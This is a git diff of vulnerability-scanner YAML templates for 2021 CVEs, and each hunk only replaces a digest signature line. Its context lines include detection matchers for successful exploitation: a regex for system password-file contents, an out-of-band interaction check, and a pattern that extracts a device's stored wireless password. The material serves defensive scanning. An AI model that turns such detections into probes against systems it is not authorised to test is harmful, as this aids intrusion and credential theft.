+# digest: 4a0a004730450220117503778b9e94f80db0303e254c6238a929f122689d99b761826065c7a27c03022100f7c4124b95489c9b6397548b504fde7a2fc3d8006995f0b15a8e31cff1ebd1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 09e96598cf..95f3ff322a 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099d1285740ade18a2d452515bacddf15f7433c6ef658f2b8640ed13791476a7e022048d15f48ee10c490f6696a29b8999737d08894c5770fc0d7973844f075ce1238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a72708c0be1fd9e954352c791a1bb87a9dec643a6487502c81a97930706f3fe5022100acc5e8f1b4f73aede22f2f447085b06786a30e046bb02e803c05feb483f90e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 8172d8b0d2..97dac0c89f 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6e6b6ae214509b16663c1be174481963518b40031b35c0ebb448735a7f82f2b022100e97e0b83c9fb1f14e13a75823cc9ebf58a93104083b1efa179e9d0045b26eec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200aa77498a3fc354033b687fad03e0e5ce81021c57bff959969552cb0d9c7f20e022100fdc33c51660f0ba7914598df61940bde9ff15361a513d29fa69ae9dbfaaacbc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index da5eb9f715..bc3136d63f 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -58,4 +58,4 @@ http: - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and -# digest: 4b0a00483046022100ece85ed0a3e7f7b62a57b55f6bcc77db0d19a90ecb24f30602d76c261fe03159022100f1481ca4357aab094b84c582f7d0dea2013206ee99a0d03a7ced0a91ecf93b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ebd0306427622fbd07c1768dfa8ecb58d13a80f7971106070053c48fa894595a022100cd93ac88aa8efefeabbeed69ff2de4875f337e81be596b93045772e4b1554ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index ee497a4678..36f578c9ca 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7ec4fddabd7c4e5b1c92e0a85de60107cb725edc697e92e2eec4031dc194c4f022100fa8b0762adbb4978b6f4b3b73d9e186a6a3e682452584d6b5cab085151013335:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030f49ac7897c20020fec3fbeab2735c2eb98b51acdadf4143c801dd1f0aaa02e022016519e1fe45a3d1d9a964467e3a0108b55e541bbe8f62068df9b7d2faf3cfc85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index 8222f07071..5e777cc46d 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -59,4 +59,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a0047304502207fdb822293ed117ac244b6204a862e4cd97d7ed5b1a6da75806a95ba16942845022100cbb141a3f60efdaf36945a8ed3e93034fdb9dfa1e221d0ad775fbc7319d814a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100e1841541a5025ffd6da8020de720413646d494700f511011ae3bb2971314b64c021f722e5fd3aa1cb5637ca501f90b000a932a1ed027eb768fce485acef0529dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index ff16725ea6..a3db024d50 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -42,4 +42,4 @@ http: - type: dsl dsl: - 'contains(body, "jato.pageSession") && status_code==200' -# digest: 4b0a00483046022100f68e3d98c58d25d03ff3e8158d70a9ad115e6df55f3f08a9e018c8c60ff399bf022100ff6e52bcdc34a7cadbffc2d9434a6273c3c09e60f8b00b28475b6dbd257f383d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018740d51e31f47d235d42ac17499f76c59b88b9553a00cf26236023c5cb4888a022100c360cf59b1ed16012bb0e2528114d01c7dde3c57f2214032e11e5f6a0cdc0333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index 0ce1ba2632..dd4cd80f70 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -64,4 +64,4 @@ http: part: body words: - 'value="responseMessage"' -# digest: 4a0a00473045022100842f48db1f533b0389671ceacc6111d6a44a0afdfc37ff547588aad0db0d2ce2022016235842d399bdd5cd3de0e7a4ffe58712448327b137121c349c382f12604969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100813d5eb87f57f57c8aaabec48c2d93322e130fddfb4efd2548f0e4c76a297184022100a7989c6ba589f72752685e797b8d120362922ec48f77001718ba3eedc3ff73bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 06e5f885b0..db3acd1037 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 201 -# digest: 4b0a00483046022100c7161451646d6a32f88513326984a5378871e42c39116388da64bb5234bb53cc022100a496b69cc17baef6be5e7b210c42daf08c840af4df3b421118b17ae99875b4e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059972e2979656b628d3e8a54cc58c689b33947b93cc382010e811816db56d2be022100f9beab8fd5df408e713824161064279e1ecfa79a857f3043629b6243acabccb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 42e5b76170..a6d98fc1ad 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201388a197774893b07ac833cc170235546644445e70aaf61aed8f306ab297ab4402201bcd114be7db3bf0c58986c8697b0a3dcfccff01035a9c57014d503de27c864c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100933d70648ac935124b95ffd3d56d1ca89821b2fb5c84c56da904f8ad6c8fca5a022100a8c80f357967fc19263cdb8871ac15642d1d38adfd01683c4a7b823d24cf85e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 78ac537567..52150037d9 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064bd44c4eb294d3c6ae23aadabeaf4342d055409c28de4185c1568c395efc345022100a32a753e4a9e222c83c6cbb9f73af94180ec63c52b800a77f1b414dfe3cf2272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210086f0b6717e92fde831b9d03965dc5886a532a38fa4b25ccbeac472571b01e68202210091c744cbb3962ce06260a00088c5b0680be0b4a5b9f95a728cf6113059a32fd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index e47de0ddcf..68a3272b38 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -45,4 +45,4 @@ http: part: body words: - "

Interactsh Server

" -# digest: 4b0a00483046022100f125f16d207fd3e53d356fe5c41c9fc12d9d715224fdfcef6af1a426dfe83f56022100e3216df501445badb52c586e7310fb9f642bcb812d9a98de6f3af7b9bd8f2875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e0fe93b82cf749b6c552a6e20200748f880ce7704f6c3dfa460a5c1dc6968dd022100f380b85f360519ba4cee543f93b074aacd1e45b3f44b57ef1435487d776b61ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index a49b3e4c07..10621f8b2a 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100835e27d67c02978fd0bee911d344ea0062c9e27f3aa7ebaa04152f8a13c5fb1502210086d26f492cb3cba2db01d24993db842112f1f8c56d94e7472d45703b2f8be045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fca1807f589ac8ce4f919bd53e36cbc09ec19b0b598901a28280f2f9c4ebc2240221009702a2f55eb692f242f34b25280a8af7b236bdf103ffaad41df6993c739a340e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 4f9477742d..bfb9148867 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200cdb22c1e900a0bffa916eead65b983954ac251a9cf37416e6a859bea4bfba74022056442b9d14d2fdaee049ad30401ec38f4ec53804185bf6b6b15df8df7f6914d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1b3e6494b9cd0a8ce79cafe3a6710f2c519e0a794837ff0672b7d57aa880c77022062de7ad4f0c57430d491bfae754d755efc7ad51013fc4471a85783e674925b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index a4285656cd..d1b87de466 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db7f7118b80efca9c6b7a9e5122c0178b53df35cccac906cc2e4b7b6f6303030022032c0e4a5b50155baed736f13c51adad1904418dc84c461c59235f96e3efa9cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075e88f3f4bc875a9a0bb1b5fd257624b8a290b5de6c2cc98d0fd95f5d30e286402204d1a6aa490440a2c56dfa06bf3b9ff9bc4daab09bb4441a8d18099d73e218936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index b45286451f..e9907ffc84 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022028b94d02cab2dca2d269c060aa0ff187310ad35a3917e3e696e358740268283f022100c91d9c5464fb7277fab1b843d65f55ca0dd5bc4b90d3e89464eb55cd8062d9b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fae3277c120a798340c690a3e344e0e799fcf9eca7379e63aab9ddc63b78e23a0220205797d5db4b76f6088eddc5f08297cc388aed88676a39dbf9145660d7dfc034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 5c6d5420f0..f88bf16dde 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -68,4 +68,4 @@ http: part: body words: - 'value="errorMessage"' -# digest: 490a004630440220198d21301bb0cc9c3eca7b3090244d4d6af10af1c8535d48b44443bc399a45a60220120ccdf8a168a43e6464f01e26d331f958ed562b71f2f1a0038dc57f6336595f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220378972d9f55dda8779aa831590d85f9331f5e4e427991c707692706dd817ebe60221008c5efea71f9e6388f6b558b5224deb9ba7bdc8fc81d19ec3e81a76c431152471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 53bf9ec457..359fb713b7 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054a7b10e32bdea6ad4464c85b29694b0a5fefd2b52c45ea6881458499ce110f6022074ab27b57a2dff0fa2011fb0edc23bda373e4d309c0498cf1470984592c44738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c169b374bf4b77e7573dec6392fde8dc29cd2e80d81945a19eaf6d62b4e6be7e02210099f3f10582c4745692e761e53f1d37c2f001edaabe8a9725fe98ea6f8a98caa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 53a4722127..430af33ded 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220130538944f3f1871ac5aeb68f5998d755e83750ee3dac79cd8b56281de5701bd022001daf8dcf6c2450756a9327e75db2241d0fa9df706b70d735eeb121711653abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220386e41252b4cdca8b218a3f6b861ee08a552be97be25783c1f280a6f976fba2602210098de271bd4f0532af5934b1a781f295f9a524b66cd2b3e831227d145af50b60d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index fdd9c980ba..1238b2759b 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -51,4 +51,4 @@ http: regex: - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' part: body -# digest: 490a00463044022046f96617b2d3f46fb61daf58af99864f5885417b5db82f144672de11b88aee0b02204fc94b7179768b51a7e4285534b628216666e5a2f21f503770ec483aa16e7c3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c934367796b4de85165e7f7999796b343c33ca8aa7a4c87ffa1b0ffa58f05ee0221008c14fe4478d7d5fa39868bdb04a79b70a404e47da93e4f5886e7a6fbf3446bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index e6ee2c214a..6dd8e0502e 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022066b28106254e20b51249bccd4a6755378cf7bd895b20f4a7cd38193a27913081022024e2161db17ae6f5c03b0ef08c86ddc750b8b80e096c106097c2b90aa5d07b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a47338e93a3380bdd7bc5a4388204db5a900c3e05631373e87c4045eaeec0f28022100f6dc9fae8ee94178b7f3cefefae67dce3a308540eabe3d1b1a82752b753fc2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index be2feaac93..8a06420388 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100823507dd00b2974bdd4f0260d6614312eb2103421df54d284e01eb0a9b14620d0221008f77848c7872a70284b767b35da931c4650b4726930dcd0501409cb1332098f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ad9daab5f4af096dadceb3890f8babf529bd46030f99690d14439e8a1419880022100da156a23fb23c3bf8e4a73539790df0991e3ec348375300dd51c9f0a70ed980a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index d3bee5e1a9..081082e937 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfbbf3db9a769e00375b35c64dca16ef254e615b0d407880713bb95445b66706022100bf105f676804f221b9236fe9820577fc487333145d8debcdecbafbc7b620a01f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b78beb00cb5e1cb54a9e2d93c1d9985befc910a93a89ed8e983d69e5cf3c2e5f02207b0787b48190812075455ab8195ffde78e40bdf8cc8c009ee355a2b79e8f6088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 4c0742aa5f..e84522093d 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205be3afa5e166bb60f492d734f2482484d4ad69393104a82b4a48b56682ec1826022100f14cf4f4f25a436f1c9a8df7e69804e2f6eb76231534db52d1a6c2c4b9e75d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc05eb717e7b84bb0bde4f0cccd8943c67d59f15011f279e75212a27698d53700220287c2e9a2a6415f33a7f5605dd777db2502d48c54a3d7c9b28acca223d0054df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 629ef8ce82..0a1bb1edd4 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203161ea5c26c4c512386e2efe937f9ae5b4d1450eee8b0a2d7c58cc7e6cb181c4022012d878b741870619e46248e6c0979e2defbed91775c861658417c3125cbdbb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033bf7deafca9f468fa82d9026d812227263f306a1953f992a6638e15279f7fd50221009d239e8a2fe3bcb99fcbb90deaa952eebfe62184020e007df4da29deeced730e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 50ed6d0a55..556fd5a61d 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and -# digest: 4a0a0047304502200c34a850d39fbeeddbc540d1d52ba9d67b8a5204578f8e85b7f4eb94e0afb1830221009b0894c1fc99cb6734f92c3f89d62c547c7a350f7e0f4c6b5edacd23e5a8ae19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d4902f51f560fcf0ded1e355944479986a26099d29a7f3247c2c0a35fb533e402204b3ddd6af36676a8993b163161d15f67e560f97d3e61e4a0d1cd13004d189c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 6e19ed1bad..f951cbae8d 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100add3f33b9d2e9d57977208908f642566e5d796379120daba28b5ee7685d38b7702204fc9e494046fce48f88b428f7fc426ddca6906f03364c55c0ca03adc357c0660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220636647297d4ef8ee4209bcdd8e9c628fadf1cbce433fc90c55a3610304409ddc022100a82da2af0c0b6fb1b2eeba56b7cf873e164f198d04e1301afd9c07ecfef0f726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 601045c4e4..fcab1361e6 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -49,4 +49,4 @@ http: part: body words: - '">' -# digest: 490a00463044022079123fdae879b637f0e9fb80ff3f14cd52ea536bb21973d4e6c42e424732e1a60220569e530531fa3d07ffc1a9a0b5e334557b3ef103999048a2f5b1dd3ff6d64376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001068e1ddaf3c98d6733d9d17ce3ca0f27152fa717d76ce4180805b2d3cbc1e0022100f9fea88e57be3c2358133f57b3ff53d4ecb3b4469d87698b45a12f487f25d320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index e4529cfda9..13be6a198a 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -47,4 +47,4 @@ http: part: header words: - text/html -# digest: 490a0046304402204da43b60754d42852c0d693d43abcf91056309cafe0f417a0617d01a0f0ae6e502205bcbba054b716ae69bf7c9187fa6ff4c3ab2fb69bfe3a240d82721db8221ff5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022074fa2eefd54c49e067c7b03e4b63355d495e8731b2236215abe908c6373eb73d022100e598dcc890332b546006164d52e772f1f6e9fd9b51df9c4ba6496829000bd407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 381f4d02f1..ce5d890c14 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c618c0c706f90ae263dca7f791eea7727f5208a02ff97a620dcdd3f48789bb41022100ae5d555a29e8c87d665ceaff0e8dae13667c2586e6402cb9b17e8e458f7dc467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100868bee0b52a32c55d97ef8959cacd265327d13225dd86188eb66c861c5c873c10221008385fe865b3f5cffe619d475b76c6ce876664435a96f0e2f0344f269920271fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index a406109b52..1f9557aa0f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068d41164ba855a2600f7fcfeb4d98a1ede131baf6cf5bae9be7f37e595bfe786022023c4b711bf8091b7d6c996aa06fc134a97a34eefab9dfeae693d6ac7e3061bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008fc9ed93c6e938c96e612190d3b15c829dc82e6f16f8229c8387cfd205ab43770220660a35947ff68a217b4aaac34bbe7089f6da7f8dca0181606d0334b634330d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index ae92682338..32e43a9ad0 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b35315666af836eb0d1c0cb629dcaa9244de7f8bef62b0d942503cd51f77f79a02203a67df731f946a044f7dd7a2137b3fbcc76a48fd94edd78b8ef4ed6f2300d002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008bc70d06d43fd8bdb3ad8f830ef19bf1b4849e1d1e5073789d8b9ed29881747a022100c53d6d51fbcfd7ee4ada2c36666e44148ff4ea26623f1ba33ad111633bf453ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 571c3ad736..35b27b217d 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022045824ff16ba16cb21de7b21e60ac029eb7fda55842dad99fc023a5ee7f91376e02201d497628c7f2ade3b6b6b9dcf46184a710305a6d3461abb2b4ef0e4d643ca3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ebcb1ee8c45888c514b32987b94795348c56e452ad1ad64486523b89e346e9802210088e879fcea852853cdf91ed44d993a35eaabe332f76cb7a52d7f62fce2955dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index e14aefe39e..9985250851 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022024dea9a3df7016acc7f7259f997886586c771dce081949605bfc5a966edd61ac022100dbed0c4ff5dca2ef9cc708946e75516b5994715572b6dbe6f3e4c8479cdb8c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066374cd3cba293cdd5323e654c3596af22de64979b1ef3962c344cae21d1894b0220685618efe4f4080e0f0b3d9e41d9088f6a1284e302fed371714148ae75bc0af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index f1ee5ac188..7b1d9a38ef 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -61,4 +61,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502210099350b0b9e08a8c89bba1fb6dcfd7cc4a0a7a0220ffb6f74b0da393d51d218e90220480b82d744ec40d5ac5a7a57b6067c4579ba4fb210ad395f4b4a253cd802293c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028bad9749b9ae4d945e0cde1a909d8f43e8fdb919b6f9a579fe65f9ab72b95ef022100e3abdfd25fa01e8d16246da58b8e0307af0381a5023cd306e574029b2fb13653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index c45ee5267b..7cf739e84d 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -42,4 +42,4 @@ http: - '(body == "false ")' - 'status_code == 200' condition: and -# digest: 490a004630440220695d58cf0fd21f4c1d710467e6b21c1e233c8de8bafe4a76b86ee296c287fa2a02205bc6ca3e58157209e19f18fbea88fdb9fd57c43fc67a858599a23a5186cceec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038b8aeb034956bdc62b2cc0faf3b3b96c56487ef30a73cca3e5b4d7f7cc68e4e022100913143d230a19128c200ec72b3f3223614ba45b286c16c61e55e0afbf315b8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 35519a7591..996e0578de 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -51,4 +51,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502201018efcf4dfa0c313545ef9790e0659cb28de43d8e02fbd289666a7bd7fa02eb022100baa7210d4d9a2b15c8410c84b98b928a6b2db3f6591f6a64b1e7eb32144c7b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064d1be9f5d7a1bf3459780fa37e408c640727b9308a51f197ed5253618aaaadf02204ed66a55a7347bd65e48b20fc814433d92dc31b9bb2d36e63a278a3729fa4a74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 